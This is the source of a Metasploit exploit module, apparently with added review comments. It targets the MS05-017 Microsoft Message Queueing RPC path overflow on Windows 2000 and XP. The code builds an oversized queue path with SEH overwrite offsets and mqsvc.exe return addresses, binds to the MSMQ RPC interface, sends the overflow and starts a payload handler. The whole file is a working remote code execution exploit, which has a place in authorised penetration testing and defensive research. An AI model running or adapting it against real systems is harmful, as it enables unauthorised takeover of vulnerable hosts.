GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/windows/dcerpc/ms05_017_msmq.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
# Exploit module for the MS05-017 Message Queueing (MSMQ) RPC path overflow
# (CVE-2005-0059). RPC transport and NDR framing come from the DCERPC mixin;
# the SEH record is built by the Seh mixin. Every offset written into the
# buffer is shifted by the byte length of the target's NetBIOS hostname,
# which is why HNAME is a required option rather than something discovered
# on the fly.
class MetasploitModule < Msf::Exploit::Remote
  Rank = GoodRanking

  include Msf::Exploit::Remote::DCERPC
  include Msf::Exploit::Remote::Seh

  # Registers the module metadata, the single target and the two options
  # this module depends on (RPORT, defaulted to the MSMQ RPC port, and HNAME).
  #
  # @param info [Hash] module info hash merged by update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'MS05-017 Microsoft Message Queueing Service Path Overflow',
        'Description' => %q{
          This module exploits a stack buffer overflow in the RPC interface
          to the Microsoft Message Queueing service. The offset to the
          return address changes based on the length of the system
          hostname, so this must be provided via the 'HNAME' option.
          Much thanks to snort.org and Jean-Baptiste Marchand's
          excellent MSRPC website.
        },
        'Author' => [ 'hdm' ],
        'License' => MSF_LICENSE,
        'References' => [
          [ 'CVE', '2005-0059'],
          [ 'OSVDB', '15458'],
          [ 'MSB', 'MS05-017'],
          [ 'BID', '13112'],
        ],
        'Privileged' => true,
        'Payload' => {
          'Space' => 1024,
          # Bytes that must not appear in the generated payload; the same
          # set is passed to rand_text_english for the filler in #exploit.
          'BadChars' => "\x00\x0a\x0d\x5c\x5f\x2f\x2e\xff",
          'StackAdjustment' => -3500,
        },
        'Platform' => %w{win},
        'Targets' => [
          [
            'Windows 2000 ALL / Windows XP SP0-SP1 (English)',
            {
              'Platform' => 'win',
              # mqsvc.exe -- index 0 is used for the Windows 2000 layout and
              # index 1 for the Windows XP layout (see #exploit).
              'Rets' => [ 0x004014e9, 0x01001209 ] # mqsvc.exe
            },
          ],
        ],
        'DisclosureDate' => '2005-04-12',
        'DefaultTarget' => 0,
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    # Change the default port values to point at MSMQ
    register_options(
      [
        Opt::RPORT(2103),
        OptString.new('HNAME', [ true, "The NetBIOS hostname of the target" ]),
      ]
    )
  end

  # Presumably consulted by the framework during automated exploitation (the
  # remap comment below implies this): normalises RPORT and refuses to run
  # without a hostname.
  #
  # @return [Boolean] false when HNAME is unset, true otherwise
  def autofilter
    # Common vulnerability scanning tools report port 445/139
    # due to how they test for the vulnerability. Remap this
    # back to 2103 for automated exploitation

    rport = datastore['RPORT'].to_i
    # `or` binds loosely, but inside this parenthesised condition it behaves
    # the same as ||.
    if (rport == 445 or rport == 139)
      datastore['RPORT'] = 2103
    end

    # The NetBIOS hostname is required to exploit this bug reliably.
    # NOTE(review): this is a plain truthiness test, so an empty-string HNAME
    # passes it; only a nil/unset option is rejected here.
    if (not datastore['HNAME'])
      # XXX automatically determine the hostname
      return false
    end

    true
  end

  # Builds the oversized queue path, binds to the MSMQ RPC interface on RPORT,
  # sends the path as opnum 9 and then interprets the 4-byte stub data the
  # server returns, if any.
  def exploit
    # MSMQ supports three forms of queue names, the two we can use are
    # the IP address and the hostname. If we use the IP address via the
    # TCP: format, the offset to the SEH frame will change depending on
    # the length of the real hostname. For this reason, we force the user
    # to supply us with the actual hostname.

    # Formats: DIRECT=TCP:IPAddress\QueueName DIRECT=OS:ComputerName\QueueName

    queue_name = "OS:#{datastore['HNAME']}";
    # Hostname length in bytes after widening (presumably two bytes per
    # character, matching the unicode() conversion below); every offset
    # into buf is shifted by this amount.
    queue_hlen = datastore['HNAME'].length * 2
    queue_path = unicode(queue_name + "\\PRIVATE$\\")

    # Filler that avoids the payload's bad characters; the values below are
    # patched into it in place with String#[]=.
    buf = rand_text_english(4000, payload_badchars)

    # Windows 2000 SEH offset goes first
    # ('V' packs target['Rets'][0] as a little-endian 32-bit value)
    buf[372 - queue_hlen + 0, 4] = [ target['Rets'][0] ].pack('V')
    buf[372 - queue_hlen - 4, 2] = "\xeb\x22"

    # Windows XP SEH offset goes second
    # (SEH record construction is delegated to the Seh mixin)
    seh = generate_seh_payload(target['Rets'][1])
    buf[400 - queue_hlen - 4, seh.length] = seh

    # Append the path to the location and null terminate it
    # (<< mutates queue_path in place)
    queue_path << buf << "\x00\x00"

    # Get the unicode length of this string
    # NOTE(review): queue_plen is never read after this assignment.
    queue_plen = queue_path.length / 2

    connect
    print_status("Trying target #{target.name}...")

    # Interface UUID, version, protocol sequence and endpoint for the bind.
    # From a monitoring standpoint the bind to this UUID on the MSMQ port is
    # the distinguishing feature of this traffic; the bind itself is issued
    # by the DCERPC mixin.
    handle = dcerpc_handle('fdb3a030-065f-11d1-bb9b-00a024ea5525', '1.0', 'ncacn_ip_tcp', [datastore['RPORT']])
    print_status("Binding to #{handle} ...")
    dcerpc_bind(handle)
    print_status("Bound to #{handle} ...")

    # Six NDR longs followed by the queue path as a pre-built conformant
    # varying Unicode string.
    stubdata =
      NDR.long(1) +
      NDR.long(1) +
      NDR.long(1) +
      NDR.long(3) +
      NDR.long(3) +
      NDR.long(2) +
      NDR.UnicodeConformantVaryingStringPreBuilt(queue_path)

    print_status('Sending exploit ...')

    # Opnum 9. The return value is not used; the outcome is read from
    # dcerpc.last_response below.
    response = dcerpc.call(9, stubdata)

    # Only inspect the reply when both the response and its stub data exist.
    # The case arms are exact 4-byte matches against the raw stub data.
    if (dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil)
      case dcerpc.last_response.stub_data
      when "\x20\x00\x0e\xc0"
        print_status("The server rejected our request, the HNAME parameter could be incorrect")
      when "\x1e\x00\x0e\xc0"
        print_status("The server does not appear to be exploitable")
      else
        print_status("An unknown response was received from the server:")
        print_status(">> " + dcerpc.last_response.stub_data.unpack("H*")[0])
      end
    end

    # handler and disconnect are provided by the exploit/DCERPC mixins
    # (not visible here).
    handler
    disconnect
  end
end